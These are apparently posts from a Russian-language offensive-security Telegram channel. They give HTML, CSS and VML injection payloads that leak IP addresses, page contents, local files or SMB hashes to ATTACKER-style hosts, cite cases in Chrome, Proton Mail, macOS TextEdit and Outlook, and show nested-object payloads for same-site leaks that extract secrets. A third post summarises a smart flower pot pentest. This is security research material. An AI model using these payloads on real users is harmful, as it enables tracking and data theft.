<style>@import url(https://leaking.via/css-import-url);</style>
<noscript version="1.1" xmlns="http://www.w3.org/2000/noscript"><rect cursor="url(https://leaking.via/noscript-cursor),auto" /></noscript>
<xml src="https://leaking.via/xml-src" id="xml"></xml>
<math xlink:href="https://leaking.via/mathml-math">CLICKME</math>
...

▪️ Несколько примеров из реальной жизни:

➖[Chrome]  Leak user html content using Dangling Markup injection when http upgrade to https

▪️ЧТО:       <img src="http://ATTACKER/?q=
▪️КОГДА:   HTTP➡️HTTPS для http://ATTACKER
▪️ИТОГ:      утечка содержимого страницы


➖[Proton]  User IP address leaked on email open

▪️ЧТО:       <noscript><style>circle { background-image: url(https://ATTACKER/200); }</style><circle></circle></noscript>

▪️КОГДА:  при открытии письма
▪️ИТОГ:      утечка IP адреса


➖[macOS]  This man thought opening a txt file is fine, he thought wrong

▪️ЧТО:
ℹ️ <!DOCTYPE HTML><html><head></head><body><style>@import{ "file:///net/ATTACKER/a.css"}</style></body></html>
ℹ️ <iframedoc src="file:///etc/passwd">

▪️КОГДА:  при открытии TXT файла в TextEdit
▪️ИТОГ:      DoS (например, подтянуть /dev/zero), утечка IP адреса + содержимого локальных файлов (*объединить пейлоады)


➖[MS Outlook]  SMB hash hijacking & user tracking

▪️ЧТО: <v:background xmlns_v="urn:schemas-microsoft-com:vml"><br><v:fill src="<strong>its:/ATTACKER/IDontExistNew/foobar</strong>"></v:fill><br></v:background>

▪️КОГДА:  при открытии письма
▪️ИТОГ:  внешние SMB / WebDAV запросы

@HaHacking 🐇

⚙️   #заметки #offense #web

Не отходя от Client-Side атак, захотелось-таки сохранить здесь материалы по XS-Leaks / Cross-Site Leaks; :)

➡️"Библии":

   🧩   xsleaks/xsleaks  💻  🧩   xsleaks.dev

   🧩   [OWASP] Cross-site leaks Cheat Sheet


➡️Дополнения:

➖Introduction to Cross-Site Leaks
➖XS-Leaks Attacks and Prevention
➖[PortSwigger]  Latest cross-site leak news

➖xsinator.com
▪️testing.html➖ тест браузера на уязвимость к 38 векторам XS-Leaks;


➡️Любопытные дополнения:

➖From XS-Leaks to SS-Leaks Using object

"SameSite: Lax" cookie затрудняют эксплуатацию XS-Leaks. Но если веб-приложение уязвимо к HTML Injection, можно воспользоваться идеей XS-Leaks для проведения похожей boolean-based атаки (SS-Leaks / Same-Site Leaks) и извлечения информации от лица атакуемого пользователя;

▪️ <iframe> обновляет своё содержимое вне зависимости от кода ответа
▪️ <object> НЕ обновляет своё содержимое при 404


▪️HTML Injection без особой CSP:

[ Результаты ]

➡️ Есть запрос к ATTACKER =  /api/v1/leaky?secret=a вернул 404
➡️ Нет запроса к ATTACKER =  /api/v1/leaky?secret=a вернул 200

<object data="/api/v1/leaky?secret=a">
    <object data="https://ATTACKER?callback=a">
    </object>
</object>

▪️HTML Injection в видимой области➕CSP блокирует внешние объекты:

[ Пример CSP➕Результаты ]

Content-Security-Policy: default-src 'self'; img-src *;

➡️ Есть запрос к ATTACKER =  /api/v1/leaky?secret=a вернул 404
➡️ Нет запроса к ATTACKER =  /api/v1/leaky?secret=a вернул 200

<object data="/api/v1/leaky?secret=a">
    <img src="https://ATTACKER?callback" loading="lazy">
</object>

▪️HTML Injection НЕ в видимой области➕CSP блокирует внешние объекты:

[ Результаты ]

➡️ Запрос с callback=0 =  /api/v1/leaky?secret=a вернул 404
➡️ Запрос с callback=1 =  /api/v1/leaky?secret=a вернул 200

<object data="/api/v1/leaky?secret=a">
    <iframe srcdoc="<img srcset='https://ATTACKER?callback=1 480w, https://ATTACKER?callback=0 800w' sizes='(min-width: 1000px) 800px, (max-width 999px) 480px'>" width="1000px">
</object>

   @HaHacking  🐇

🍃🌼 #наработки #offense #iot #web 🌼🍃

➡️Статья➕Презентация с Хакерского митапа SPbCTF x Yandex / История о black-box анализе защищённости необычного IoT устройства:


   🧩   ‟Plants vs. Bugs: пентест умного цветочного горшка”

   ⬇️  HaHacking_Plants-vs-Bugs.pdf  ⬇️


Исследуем и раскроем проблемы безопасности умного цветочного горшка через изучение самых разнообразных входных точек вдоль стека OSI, рассмотрев в комплексе интерфейсы, окружающие устройство умного дома и включенные в него:

➖от сенсоров до веб-приложения
➖от порта локального контроля до мобильного приложения

▪️Сетевые атаки
▪️Evil Twin через Deauthentication атаку
▪️Имперсонация клиента
▪️Имперсонация сервера обновлений

▪️Уязвимости веб-приложения
▪️Broken Access Control (дефейс, нарушение работы)
▪️Time-based сканирование LAN
▪️Improper Input Validation (чтение / запись в память, кража чувствительных данных)

▪️Управление через расширенный API
▪️Эмуляция нажатий
▪️Mass Assignment (подмена неизменяемых параметров, Open Redirect в мобильном приложении)

🍃🌸 Читать полностью... 🍃

//   Время чтения: ~20 минут
➡️Enjoy!  💐

   @HaHacking  🐇